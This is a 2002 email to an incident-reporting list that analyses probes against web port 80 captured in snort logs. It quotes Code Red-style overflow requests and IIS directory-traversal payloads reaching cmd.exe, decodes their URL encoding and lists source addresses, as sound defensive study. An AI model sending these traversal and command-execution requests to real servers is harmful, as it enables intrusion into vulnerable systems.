TCP:80 payloads

An email to intrusions@incidents.org, based upon some study of the first few days of probes to TCP:80 monitored by ACK_hole

From jsage@finchhaven.com Tue Aug 13 12:06:05 2002
Date: Tue, 13 Aug 2002 12:06:05 -0700
From: John Sage 
To: intrusions@incidents.org
Subject: Notes on packet payloads in probes to TCP:80
Message-ID: <20020813120605.L1658@finchhaven.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i

Now that ACK_hole lets me see packet payloads, here's some notes on
what snort 1.8.7 is logging, in the very common probes to TCP:80 http

Over a *very* brief timeframe, probes seem to come in three forms:

1) One variant is almost always 16 packets for the entire transaction,
and contains one packet with a GET, and a second packet with the
infamous /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNN...

Count: roughly 8


2) The second variant is almost always 144 packets for the entire
transaction, and contains packets, in this order, of the form:

Count: roughly 9

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r 
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir
GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+dir 32/cmd.exe?/c+dir
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir 
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir 
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir dir 
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir r 

(decoder: 0x5C = "\"; 0x55 = "U"; 0xc1 = "A-tilde"?; 0xC is not any
ASCII character; 0x2F = "/" )

And each of these end with some variation on:

HTTP/1.0..Host: www..Connnection: close....

snort 1.8.7 logs all of these at right about 51-42k


3) The third variant is somewhat like the second, but shorter, and of
less consistent packet count. More like a "some of the above" with
variations. They almost seem hand-crafted, perhaps..

Count: roughly 3

Some examples:

From 217.227.238.18:

GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir+c:\ c:\ 
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir+c:\ c:\ 
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir+c:\ c:\
GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\
GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\ 
GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\ 

0x2E is a dot.. 0xC is nothing more than 0000 1100 binary...


Here's three-of-a-kind:

From 65.198.208.56:

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..


From 193.251.152.91:

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..


From 216.181.16.2:

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..


Is this some kind of distinct tool, or some clown trying to do it by
hand?



Interesting...

- John
-- 
Most people don't type their own logfiles;  but, what do I care?

PGP key:     http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705